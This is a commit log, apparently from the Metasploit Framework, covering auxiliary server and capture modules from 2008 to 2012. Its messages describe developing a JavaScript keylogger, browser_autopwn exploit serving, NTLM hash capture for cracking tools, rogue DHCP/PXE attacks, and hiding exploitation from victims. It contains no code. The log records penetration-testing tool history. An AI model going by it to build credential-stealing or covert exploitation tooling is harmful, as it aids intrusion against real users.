HD Moore ceb4888772 Fix up the boilerplate comment to use a better url 2012-02-20 19:40:50 -06:00
Tod Beardsley 8ad9beef75 Removing javascript_keylogger from master. 2012-02-06 09:37:16 -06:00
sinn3r b2ae8a24dc Fix go cow art (tabs are bad to align chars) 2012-02-05 02:20:31 -06:00
sinn3r 0dd3ad0efb Remove naughty trailing commas 2012-02-05 02:03:49 -06:00
sinn3r 26f89f65bd Fix the bug that causes store_loot() to run twice. Also, other minor format changes. 2012-02-05 02:00:03 -06:00
Marcus J. Carey c06b0f7e72 cleaning up an editor glitch. 2012-02-02 17:59:51 -06:00
Marcus J. Carey 1a278c55b5 a bit more cleanup 2012-02-02 16:19:21 -06:00
Marcus J. Carey 45b58bea06 got rid of bmp generation 2012-02-02 16:07:27 -06:00
Marcus J. Carey e96eceb145 Editing Javascript keylogger 2012-02-02 15:01:22 -06:00
Marcus J. Carey 7b3262958d Merge branch 'master' of github.com:threatagent/metasploit-framework
Conflicts:
	modules/auxiliary/server/capture/javascript_keylogger.rb
2012-02-02 14:58:23 -06:00
Marcus J. Carey 59a44f75ec Updated Javascript Keylogger 2012-02-02 14:42:13 -06:00
Marcus J. Carey f45528ec68 Update modules/auxiliary/server/capture/javascript_keylogger.rb 2012-02-02 10:33:33 -06:00
Marcus J. Carey 3bfb8b3c9d Adding Javascript Keylogger 2012-02-02 10:30:55 -06:00
Marcus J. Carey e70f9151e5 Merge remote-tracking branch 'upstream/master' 2012-02-02 07:13:03 -06:00
sinn3r 1dec4c0c45 These modules should use vprint_xxx() instead of print_xxx() ... if datastore['VERBOSE'] 2012-01-30 13:08:35 -06:00
Marcus J. Carey 35de6a593b Update modules/auxiliary/server/html_frame_payload.rb 2012-01-24 17:14:10 -06:00
Marcus J. Carey 2e2726c3c0 Update modules/auxiliary/server/html_frame_payload.rb 2012-01-24 17:06:49 -06:00
Marcus J. Carey 88b1cd6891 Update modules/auxiliary/server/html_frame_payload.rb 2012-01-24 17:03:33 -06:00
Marcus J. Carey 71648159a8 Update modules/auxiliary/server/html_frame_payload.rb 2012-01-24 17:00:47 -06:00
Marcus J. Carey a20bd78f75 Adding html_frame_payload.rb 2012-01-24 16:56:32 -06:00
HD Moore cd4d7d3c47 Handle IPv6 properly (host header parsing) 2011-12-10 13:24:58 -06:00
Tod Beardsley 8ccb68c9df Adding an add_socket() to dhcp and rftp as lauched with a survice
when succesful.

Closing the related pull reuquest for this one.
2011-12-10 03:39:25 -06:00
HD Moore cf28713f9a Mark specific modules as incompatible due to use of quad-dot code 2011-12-05 13:07:36 -06:00
James Lee 67120d4263 msftidy on aux modules, see #5749 2011-11-20 13:12:07 +11:00
HD Moore 43fa2c3d1b Add a gitignore and delete the broken file_autopwn code. Fixes #4964 2011-11-10 20:11:53 -06:00
David Maloney aa4f6c1cae More cred sourcing fixes
git-svn-id: file:///home/svn/framework3/trunk@14193 4d416f70-5f16-0410-b530-b9f4589650da
2011-11-08 18:45:47 +00:00
Wei Chen d98ab06464 This fixes the nil problem with arg. See bug #5848
git-svn-id: file:///home/svn/framework3/trunk@14070 4d416f70-5f16-0410-b530-b9f4589650da
2011-10-25 20:48:17 +00:00
Joshua Drake 62c8c6ea9f big msftidy pass, ping me if there are issues
git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da
2011-10-23 11:56:13 +00:00
Wei Chen 973227933b Add CVE-2011-1290 as an aux module
git-svn-id: file:///home/svn/framework3/trunk@13994 4d416f70-5f16-0410-b530-b9f4589650da
2011-10-18 16:30:28 +00:00
Wei Chen 975cc52bac Fix spelling errors
git-svn-id: file:///home/svn/framework3/trunk@13983 4d416f70-5f16-0410-b530-b9f4589650da
2011-10-18 00:54:05 +00:00
Tod Beardsley 30ac88694f More msftidy fixes. Now I'm going to get a little more surgical to get this to move faster.
git-svn-id: file:///home/svn/framework3/trunk@13963 4d416f70-5f16-0410-b530-b9f4589650da
2011-10-17 02:58:53 +00:00
Tod Beardsley e9461c766e Msftidy run against a bunch of whitespace violations, a few line too longs.
git-svn-id: file:///home/svn/framework3/trunk@13962 4d416f70-5f16-0410-b530-b9f4589650da
2011-10-17 02:42:01 +00:00
HD Moore 3c73c3c2f8 Pile of small bug fixes for the FTP server and mixin
git-svn-id: file:///home/svn/framework3/trunk@13924 4d416f70-5f16-0410-b530-b9f4589650da
2011-10-14 23:07:09 +00:00
Matt Weeks 6853221762 Fixes #5313 by adding logging support to pivoted PXE attacks, and displaying results as the module runs.
git-svn-id: file:///home/svn/framework3/trunk@13646 4d416f70-5f16-0410-b530-b9f4589650da
2011-08-27 15:46:49 +00:00
Matt Weeks f9e651d382 Report to DB too.
git-svn-id: file:///home/svn/framework3/trunk@13640 4d416f70-5f16-0410-b530-b9f4589650da
2011-08-25 22:56:22 +00:00
Matt Weeks 23b4f4ed98 Address #5313 for locally-launched PXE attacks.
git-svn-id: file:///home/svn/framework3/trunk@13639 4d416f70-5f16-0410-b530-b9f4589650da
2011-08-25 22:48:33 +00:00
HD Moore 8b72de1af6 Cosmetic
git-svn-id: file:///home/svn/framework3/trunk@13557 4d416f70-5f16-0410-b530-b9f4589650da
2011-08-13 16:51:49 +00:00
amaloteaux 377c987c1d report hashes captured by htp_ntlm server
git-svn-id: file:///home/svn/framework3/trunk@13496 4d416f70-5f16-0410-b530-b9f4589650da
2011-08-06 14:50:15 +00:00
amaloteaux 08322fc7ea smb capture: split creds.ptype from smb_net_hash to smb_netv1_hash and smb_netv2_hash
smb_netv1_hash correspond to netlmv1/netntlmv1 and netntlm2_session hash type
smb_netv2_hash correspond to netlmv2/netntlmv2 hash type
also removed the domain name from creds.user and added it to the pass column like this DOMAIN:NETLMHASH:NETNTLMHASH:CHALLENGE


git-svn-id: file:///home/svn/framework3/trunk@13372 4d416f70-5f16-0410-b530-b9f4589650da
2011-07-27 17:53:09 +00:00
amaloteaux 95577d3b1b smb_net_hash instead of smb_hash
git-svn-id: file:///home/svn/framework3/trunk@13356 4d416f70-5f16-0410-b530-b9f4589650da
2011-07-27 01:49:53 +00:00
amaloteaux 67a3f7bd75 same for http_ntlm capture
git-svn-id: file:///home/svn/framework3/trunk@13354 4d416f70-5f16-0410-b530-b9f4589650da
2011-07-26 23:47:40 +00:00
amaloteaux 8809182f62 smb capture : correct some minor bug and allow ntlm2_session hashes to be dumped in john and cain format has they can easily crack them too
git-svn-id: file:///home/svn/framework3/trunk@13353 4d416f70-5f16-0410-b530-b9f4589650da
2011-07-26 23:36:45 +00:00
Matt Weeks 0318379ca8 These are not necessary options; the DHCP server has reasonably intelligent defaults. Mark them as such.
git-svn-id: file:///home/svn/framework3/trunk@13164 4d416f70-5f16-0410-b530-b9f4589650da
2011-07-14 02:32:28 +00:00
James Lee 44d7503cc1 prefix most browser autopwn output with the address of the associated client
git-svn-id: file:///home/svn/framework3/trunk@13086 4d416f70-5f16-0410-b530-b9f4589650da
2011-07-01 23:50:07 +00:00
James Lee bee19278d7 add a new javascript obfuscation engine using rkelly for parsing. use it in browser_autopwn and ms10_018_ie_behaviors. see #1003
git-svn-id: file:///home/svn/framework3/trunk@12839 4d416f70-5f16-0410-b530-b9f4589650da
2011-06-03 00:36:26 +00:00
HD Moore 55b4142ddf Minor cleanup
git-svn-id: file:///home/svn/framework3/trunk@12821 4d416f70-5f16-0410-b530-b9f4589650da
2011-06-02 20:56:55 +00:00
amaloteaux ee55e0cf76 http_ntlm & smb capture : correct john/cain output, Fixes #4565 and completly Fixes #4362 now
git-svn-id: file:///home/svn/framework3/trunk@12683 4d416f70-5f16-0410-b530-b9f4589650da
2011-05-22 14:05:55 +00:00
HD Moore a8c474d7d6 Add the versioned (1.0) RPC backend
git-svn-id: file:///home/svn/framework3/trunk@12679 4d416f70-5f16-0410-b530-b9f4589650da
2011-05-22 03:50:14 +00:00
James Lee 9a2e655c53 test for java explicitly when we have javascript, refactor several things, add a 'list' command, and make the info description more descriptive
git-svn-id: file:///home/svn/framework3/trunk@12670 4d416f70-5f16-0410-b530-b9f4589650da
2011-05-20 09:11:43 +00:00
HD Moore cf3bcf2bcf Revert to old behavior for now
git-svn-id: file:///home/svn/framework3/trunk@12635 4d416f70-5f16-0410-b530-b9f4589650da
2011-05-16 14:45:37 +00:00
HD Moore 9c93eda851 Disable Java attacks for IE (breaks the chaining)
git-svn-id: file:///home/svn/framework3/trunk@12632 4d416f70-5f16-0410-b530-b9f4589650da
2011-05-16 04:21:58 +00:00
amaloteaux fd661770ed Fix #4362, thanks to Zack Fasel for report and initial patch
git-svn-id: file:///home/svn/framework3/trunk@12560 4d416f70-5f16-0410-b530-b9f4589650da
2011-05-07 18:52:17 +00:00
Matt Weeks fea1459c50 Update description
git-svn-id: file:///home/svn/framework3/trunk@12559 4d416f70-5f16-0410-b530-b9f4589650da
2011-05-07 02:46:30 +00:00
Joshua Drake 78d3998854 Fixes #4125, add hostname support to the Rex DHCP server & aux module
git-svn-id: file:///home/svn/framework3/trunk@12375 4d416f70-5f16-0410-b530-b9f4589650da
2011-04-20 14:21:36 +00:00
HD Moore f1f15ba448 Allow socks4a to relay through meterpreter
git-svn-id: file:///home/svn/framework3/trunk@12353 4d416f70-5f16-0410-b530-b9f4589650da
2011-04-18 18:17:49 +00:00
Mike Smith d5d9d56081 Create a dedicated db table to track sessions & session events.
* Add new db tables for session & session_events
* Migrate existing session data from events db table
* Modify session report methods to log to the new tables


git-svn-id: file:///home/svn/framework3/trunk@12273 4d416f70-5f16-0410-b530-b9f4589650da
2011-04-07 21:59:32 +00:00
amaloteaux 7e522d9979 http capture : add challenge as an option
git-svn-id: file:///home/svn/framework3/trunk@12231 4d416f70-5f16-0410-b530-b9f4589650da
2011-04-03 23:31:14 +00:00
HD Moore 5ab60f2966 Fixes #3938 by correcting the path for the filename
git-svn-id: file:///home/svn/framework3/trunk@11946 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-13 15:04:16 +00:00
amaloteaux 544fb61aa2 server capture smb will check for empty pass and not display on screen
git-svn-id: file:///home/svn/framework3/trunk@11937 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-11 20:27:22 +00:00
amaloteaux 5f6995e8d3 enable ntlmv2 and signing for smb client stack (pth implementation is coming), fixes #11678 and #152
git-svn-id: file:///home/svn/framework3/trunk@11893 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-07 19:57:53 +00:00
Joshua Drake 8ef05017b8 style compliance fixes, naughty naughty
git-svn-id: file:///home/svn/framework3/trunk@11796 4d416f70-5f16-0410-b530-b9f4589650da
2011-02-22 20:49:44 +00:00
Joshua Drake 7fb3094bb0 remove "File" from title
git-svn-id: file:///home/svn/framework3/trunk@11746 4d416f70-5f16-0410-b530-b9f4589650da
2011-02-12 22:30:54 +00:00
HD Moore ac651fba6b Merge code from Alexandre Maloteaux, fixes #3615
git-svn-id: file:///home/svn/framework3/trunk@11678 4d416f70-5f16-0410-b530-b9f4589650da
2011-01-30 19:26:35 +00:00
Joshua Drake a0a8ea8cbd re-order includes a bit
git-svn-id: file:///home/svn/framework3/trunk@11641 4d416f70-5f16-0410-b530-b9f4589650da
2011-01-25 21:32:59 +00:00
HD Moore 3794ed35cc Apply patches from Matthew Weeks (scriptjunkie) to fix traversal flaws outlined in his Black Hat DC talk:
https://media.blackhat.com/bh-dc-11/Weeks/BlackHat_DC_2011_Weeks_Counterattack-wp.pdf
https://media.blackhat.com/bh-dc-11/Weeks/BlackHat_DC_2011_Weeks_Counterattack-Slides.pdf



git-svn-id: file:///home/svn/framework3/trunk@11636 4d416f70-5f16-0410-b530-b9f4589650da
2011-01-25 02:24:37 +00:00
Joshua Drake e821f7e757 Fixes #3567, apply patch to make ports/payloads configurable
git-svn-id: file:///home/svn/framework3/trunk@11611 4d416f70-5f16-0410-b530-b9f4589650da
2011-01-20 20:32:18 +00:00
Tod Beardsley 1d7745d449 Add some tracking datastore objects (ParentUUID and AutopwnUUID) to browser_autopwn.rb's exploits and multi/handlers to make exploit tracking a little easier.
git-svn-id: file:///home/svn/framework3/trunk@11592 4d416f70-5f16-0410-b530-b9f4589650da
2011-01-17 22:15:22 +00:00
James Lee f2661e68db don't respond with 404's for requests that don't match the URIPATH exactly. allows for more generic hash stealing and fixes 3442
git-svn-id: file:///home/svn/framework3/trunk@11576 4d416f70-5f16-0410-b530-b9f4589650da
2011-01-13 20:57:33 +00:00
James Lee 1ecb293010 pass the listener bind address through to handlers
git-svn-id: file:///home/svn/framework3/trunk@11493 4d416f70-5f16-0410-b530-b9f4589650da
2011-01-06 21:18:24 +00:00
James Lee 9c1f7b28e2 pass SSL opt on to submodules
git-svn-id: file:///home/svn/framework3/trunk@11346 4d416f70-5f16-0410-b530-b9f4589650da
2010-12-15 23:02:04 +00:00
Joshua Drake b30270e742 fix version
git-svn-id: file:///home/svn/framework3/trunk@11310 4d416f70-5f16-0410-b530-b9f4589650da
2010-12-12 19:06:18 +00:00
HD Moore cf500fb294 Subtract the stupid
git-svn-id: file:///home/svn/framework3/trunk@10792 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-23 07:09:59 +00:00
Joshua Drake ae04e34cf7 fix some non-full-namespace includes
git-svn-id: file:///home/svn/framework3/trunk@10617 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-09 06:55:52 +00:00
Joshua Drake 840824e3e8 remove unexplained binary characters
git-svn-id: file:///home/svn/framework3/trunk@10588 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-07 16:22:16 +00:00
James Lee 3d26c54bd7 preserve some more datastore bits
git-svn-id: file:///home/svn/framework3/trunk@10518 4d416f70-5f16-0410-b530-b9f4589650da
2010-10-01 14:06:59 +00:00
James Lee 0001550e6d String#to_a was removed in 1.9.2, replace with [ str ] for compat
git-svn-id: file:///home/svn/framework3/trunk@10448 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-23 21:17:41 +00:00
James Lee aa1d8e403f make sure the list of handler jobs is initialized in case we hit cleanup before exploits have started
git-svn-id: file:///home/svn/framework3/trunk@10430 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-21 22:43:50 +00:00
HD Moore 3204b3ad83 Patch for the SMB timestamp parser which allows it to function in GMT+ zones
git-svn-id: file:///home/svn/framework3/trunk@10425 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-21 14:21:38 +00:00
HD Moore 76b14e5db7 Invert logic for consistency
git-svn-id: file:///home/svn/framework3/trunk@10403 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-21 00:06:18 +00:00
HD Moore 74e5c38fe8 Make the challenge configurable via patch from troulouliou
git-svn-id: file:///home/svn/framework3/trunk@10402 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-21 00:05:08 +00:00
Joshua Drake 4590844871 tons of indentation fixes, some other style tweaks
git-svn-id: file:///home/svn/framework3/trunk@10394 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-20 08:06:27 +00:00
Joshua Drake 78188beb6b change from capture to service
git-svn-id: file:///home/svn/framework3/trunk@10393 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-20 08:05:50 +00:00
James Lee 5f0cc946b1 document report_note a little better, and modify several modules to use it correctly. fixes #2568
git-svn-id: file:///home/svn/framework3/trunk@10377 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-19 22:25:56 +00:00
Stephen Fewer 5e2295a9a8 Add in an aux module to create a socks4 proxy server. If you add in a route via a meterpreter session to the framework routing table the proxy server will use that route where appropriate. (Also modified the servers opts hash to optionally take a 'Comm' param if you want to programmatically create a socks4 server which will always use a specific meterpreter session for all socket creation - by default this does not happen and it uses the rex socket switchboard as per normal rex socket creation).
git-svn-id: file:///home/svn/framework3/trunk@10337 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-16 18:23:03 +00:00
James Lee 94aac0c517 dunno why i never thought of this before. clean up spawned exploits when stopping browser_autopwn
git-svn-id: file:///home/svn/framework3/trunk@10197 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-30 22:17:26 +00:00
James Lee 080f662595 make the LPORT_JAVA option actually visible
git-svn-id: file:///home/svn/framework3/trunk@10195 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-30 21:36:38 +00:00
Joshua Drake 6e48076249 fixes #2435, add BROADCAST option to DHCP server, use in cases where sending to 255.255.255.255 fails
git-svn-id: file:///home/svn/framework3/trunk@10159 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-26 19:34:53 +00:00
James Lee 56396a6d8b add java support to browser_autopwn
git-svn-id: file:///home/svn/framework3/trunk@10089 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-20 20:49:33 +00:00
Joshua Drake 621c0e9829 add args to call, fixes #2352
git-svn-id: file:///home/svn/framework3/trunk@10048 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-18 23:20:16 +00:00
Tod Beardsley 6d6a547b34 Fixes #2412. Adds a creds table, modifies the db_report_auth API, adds the db_creds and db_add_cred commands.
git-svn-id: file:///home/svn/framework3/trunk@10034 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-18 00:58:20 +00:00
Joshua Drake cb445588e0 fix problem with unclosed sockets
git-svn-id: file:///home/svn/framework3/trunk@10012 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-14 04:58:27 +00:00
Joshua Drake 939bf2a881 merge dhcp.diif from scriptjunkie, see #2329
git-svn-id: file:///home/svn/framework3/trunk@9990 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-13 03:11:30 +00:00
Joshua Drake d540818f01 split http exploit mixin into http/server and http/client
git-svn-id: file:///home/svn/framework3/trunk@9971 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-07 06:59:16 +00:00
Joshua Drake 7f8bbbc535 add dhcp/pxe stuff from scriptjunkie, see #2329
git-svn-id: file:///home/svn/framework3/trunk@9963 4d416f70-5f16-0410-b530-b9f4589650da
2010-08-06 17:37:28 +00:00
Joshua Drake f6033b9bd6 change some print_status to print_error, rename a few msft modules using msb convention
git-svn-id: file:///home/svn/framework3/trunk@9929 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-25 21:37:54 +00:00
James Lee 515edead31 make DOMAINBYPASS an OptString instead of OptAddress so it doesn't have to be a single domain and doesn't have to resolv at startup. fixes #2272
git-svn-id: file:///home/svn/framework3/trunk@9857 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-19 16:10:30 +00:00
Joshua Drake d07e613504 style compliance fixes
git-svn-id: file:///home/svn/framework3/trunk@9842 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-16 02:33:25 +00:00
James Lee b4643b6c4c add advanced options to mimic meterpreter payload options and pass them on appropriately. fixes #2186
git-svn-id: file:///home/svn/framework3/trunk@9790 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-12 05:19:38 +00:00
James Lee f80d08651f document.write breaks stuff. build a div and put stuff in it instead
git-svn-id: file:///home/svn/framework3/trunk@9786 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-12 00:45:37 +00:00
James Lee eab025103c include non-javascript exploits when javascript is on
git-svn-id: file:///home/svn/framework3/trunk@9785 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-11 23:53:47 +00:00
James Lee 212d9c3fd3 workaround the new module behaviour of copying for jobs by grabbing the copy out of the job context
git-svn-id: file:///home/svn/framework3/trunk@9761 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-09 23:57:54 +00:00
Joshua Drake ad9f0d91b9 add tftp server auxiliary
git-svn-id: file:///home/svn/framework3/trunk@9743 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-08 23:34:33 +00:00
Joshua Drake 310b548b67 indent-fu
git-svn-id: file:///home/svn/framework3/trunk@9656 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-01 23:48:55 +00:00
Joshua Drake 97b016cb70 missed one binary mode change
git-svn-id: file:///home/svn/framework3/trunk@9654 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-01 23:45:49 +00:00
Joshua Drake 0882838491 ensure binary mode when opening files, whitespace fixes
git-svn-id: file:///home/svn/framework3/trunk@9653 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-01 23:33:07 +00:00
HD Moore 771deac360 Adds domain bypass support from Rudy Ruiz
git-svn-id: file:///home/svn/framework3/trunk@9644 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-01 19:57:03 +00:00
James Lee 96cd7bddae compatibility for 1.9. fixes #2143
git-svn-id: file:///home/svn/framework3/trunk@9622 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-25 05:52:05 +00:00
Joshua Drake 0e72894e58 more cleanups
git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-03 17:13:09 +00:00
Joshua Drake 0ea6eca4bc big module whitespace/formatting cleanup pass
git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-30 08:40:19 +00:00
HD Moore b0425f10cd Cleanup some of the output
git-svn-id: file:///home/svn/framework3/trunk@8942 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-27 22:13:50 +00:00
James Lee a27c941714 targ_host -> target_host
git-svn-id: file:///home/svn/framework3/trunk@8909 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-25 01:09:04 +00:00
James Lee 24d93655bb print the report results even if the db is not available. see #737
git-svn-id: file:///home/svn/framework3/trunk@8898 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-24 16:28:04 +00:00
James Lee bf2a64b3ac use new argument list for get_host
git-svn-id: file:///home/svn/framework3/trunk@8711 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-04 07:59:55 +00:00
James Lee 4f08e6fd25 treat the database as write-only and use the (improved) target cache, fixes 986
git-svn-id: file:///home/svn/framework3/trunk@8708 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-04 07:37:58 +00:00
James Lee b70b17b42a don't use undefined variables.
git-svn-id: file:///home/svn/framework3/trunk@8701 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-03 19:51:05 +00:00
et 26bb74ad6e file autopwn minor fixes
git-svn-id: file:///home/svn/framework3/trunk@8486 4d416f70-5f16-0410-b530-b9f4589650da
2010-02-14 00:06:32 +00:00
et 11cc5b0a32 fix name
git-svn-id: file:///home/svn/framework3/trunk@8484 4d416f70-5f16-0410-b530-b9f4589650da
2010-02-13 23:38:01 +00:00
et 24084024c0 Add file format exploits generator. Kind of a File autopwn. Next step add Emailer
git-svn-id: file:///home/svn/framework3/trunk@8483 4d416f70-5f16-0410-b530-b9f4589650da
2010-02-13 23:32:33 +00:00
James Lee cc41516a79 don't wait for the client reporting
git-svn-id: file:///home/svn/framework3/trunk@8210 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-23 00:17:59 +00:00
James Lee 02eb7ab80d massive changes to the database api. Auxiliary::Report is now just a bunch of stubs into the main DBManager, most aux modules should just work, but they haven't all been tested. introduces a get_auth_info method for pulling credentials out of the db. other db api methods should be more standardized now. cross your fingers
git-svn-id: file:///home/svn/framework3/trunk@8028 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-29 23:48:45 +00:00
James Lee a81d8d23bd revamp version tests and the way exploits are run. fixes 673
git-svn-id: file:///home/svn/framework3/trunk@7891 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-16 00:13:57 +00:00
HD Moore bcd7343803 Fixes #563. Make fakedns act like a normal passive aux module
git-svn-id: file:///home/svn/framework3/trunk@7640 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-29 15:27:37 +00:00
James Lee d5e09a90e2 add minver and maxver options and prepare for universal module ranking
git-svn-id: file:///home/svn/framework3/trunk@7598 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-24 21:40:02 +00:00
James Lee 777317d0ad make sure everybody is using the same SRVHOST. fixes #511
git-svn-id: file:///home/svn/framework3/trunk@7545 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-16 22:06:32 +00:00
James Lee 68959ece65 use the new DisablePayloadHandler option to reduce the number of open ports required; lports per OS can be modified via advanced options
git-svn-id: file:///home/svn/framework3/trunk@7469 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-11 21:38:30 +00:00
HD Moore e3f68f2639 Another large number of warnings fixed by Yoann Guillot
git-svn-id: file:///home/svn/framework3/trunk@7248 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:18:23 +00:00
HD Moore b38a74c961 Another mega-patch from Yoann Guillot: fixes warnings generated by method calls with a space betwee the method and the parans, corrects a problem with the alpha encoders that causes them to overwrite the allowed charset, hardcodes the metasm output size of some modules in order to reduce load time, more to come
git-svn-id: file:///home/svn/framework3/trunk@7246 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 16:40:19 +00:00
HD Moore b14a4ddf0b Lots of shiny new NTLM goodness from Ryan Linn
git-svn-id: file:///home/svn/framework3/trunk@6958 4d416f70-5f16-0410-b530-b9f4589650da
2009-08-17 20:00:05 +00:00
James Lee 4070c5653b add defanged detection mode. hurray for demoing stuff i haven't committed yet
git-svn-id: file:///home/svn/framework3/trunk@6940 4d416f70-5f16-0410-b530-b9f4589650da
2009-08-06 05:56:24 +00:00
James Lee 13e54d2924 print a useful error message and bail when no exploits are found
git-svn-id: file:///home/svn/framework3/trunk@6916 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-28 11:29:14 +00:00
HD Moore 021e4c7fe1 Dont spoof the apple status page, better off exploiting the browser popup
git-svn-id: file:///home/svn/framework3/trunk@6902 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-26 05:31:29 +00:00
HD Moore 861f35979e Allow for basic authentication and access control in the FTP server module
git-svn-id: file:///home/svn/framework3/trunk@6896 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-25 04:18:37 +00:00
James Lee b386afb4da get rid of debug printing
git-svn-id: file:///home/svn/framework3/trunk@6883 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-23 09:58:13 +00:00
James Lee a467fdded7 allow autopwn sploits to specify compatible os as an array; minor refactor
git-svn-id: file:///home/svn/framework3/trunk@6881 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-23 08:43:54 +00:00
James Lee 739207bf4a merge browser_autopwn back into trunk. This changes the database schema slightly, so make sure to db_destroy and db_create before using the database features.
git-svn-id: file:///home/svn/framework3/trunk@6873 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-22 20:14:35 +00:00
HD Moore ad3e559ff9 Adds a working FTP server module
git-svn-id: file:///home/svn/framework3/trunk@6871 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-22 19:10:45 +00:00
James Lee 529ded22ae reverting last commit; somebody didn't cross their fingers
git-svn-id: file:///home/svn/framework3/trunk@6847 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-19 20:48:47 +00:00
James Lee c3dc1ecb55 reintegrate browser_autopwn into trunk; cross your fingers and hope this works
git-svn-id: file:///home/svn/framework3/trunk@6846 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-19 17:27:36 +00:00
HD Moore 957d894336 Add support for the apple network status check
git-svn-id: file:///home/svn/framework3/trunk@6746 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-06 01:12:55 +00:00
kris 37c2e301ed replacing defunct framework URL in header comments in most modules and pcap_log
git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da
2009-04-13 14:33:26 +00:00
kris 1eb8c8dfc0 meh, what can I say? I like my name
git-svn-id: file:///home/svn/framework3/trunk@6459 4d416f70-5f16-0410-b530-b9f4589650da
2009-04-03 15:05:35 +00:00
HD Moore f755cc00c0 Adds support for Yahoo! IMAP cookies (thanks Mario De Tore!) fixes a cpu eating loop in the HTTP service.
git-svn-id: file:///home/svn/framework3/trunk@6402 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-28 05:51:18 +00:00
James Lee 6bd083c441 patch from Jason Wood, adds check for extended capabilities command
git-svn-id: file:///home/svn/framework3/trunk@6346 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-16 08:48:08 +00:00
HD Moore 799d70b59a Let the target know their email did not go very far
git-svn-id: file:///home/svn/framework3/trunk@6339 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-14 03:15:28 +00:00
kris 704a92d43a add name to author list and switch some modules to use it
git-svn-id: file:///home/svn/framework3/trunk@6034 4d416f70-5f16-0410-b530-b9f4589650da
2008-12-20 21:53:17 +00:00
kris 248f1e9fc3 Remove "#{xxx.to_s}" redundancies ('s/\(#{[^}]*\)\.to_s}/\1}/g')
git-svn-id: file:///home/svn/framework3/trunk@6022 4d416f70-5f16-0410-b530-b9f4589650da
2008-12-19 07:11:08 +00:00
James Lee d185cce177 make it easier to comment out specific exploits
git-svn-id: file:///home/svn/framework3/trunk@5981 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-25 08:51:17 +00:00
HD Moore f54d91c53d Add PWFILE for Cain&Abel compatibility (thanks grutz!)
git-svn-id: file:///home/svn/framework3/trunk@5966 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-19 20:42:17 +00:00
James Lee a585fca827 typo fix
git-svn-id: file:///home/svn/framework3/trunk@5958 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-19 06:58:01 +00:00
James Lee 1935ad3ef7 don't advertise to the victim that we're trying to exploit them.
git-svn-id: file:///home/svn/framework3/trunk@5955 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-19 06:01:25 +00:00
James Lee e02574e1fc add new object detection technique to browser_autopwn
git-svn-id: file:///home/svn/framework3/trunk@5941 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-17 07:53:44 +00:00
HD Moore f5374fe2d2 Syntax fixups
git-svn-id: file:///home/svn/framework3/trunk@5894 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-12 19:31:11 +00:00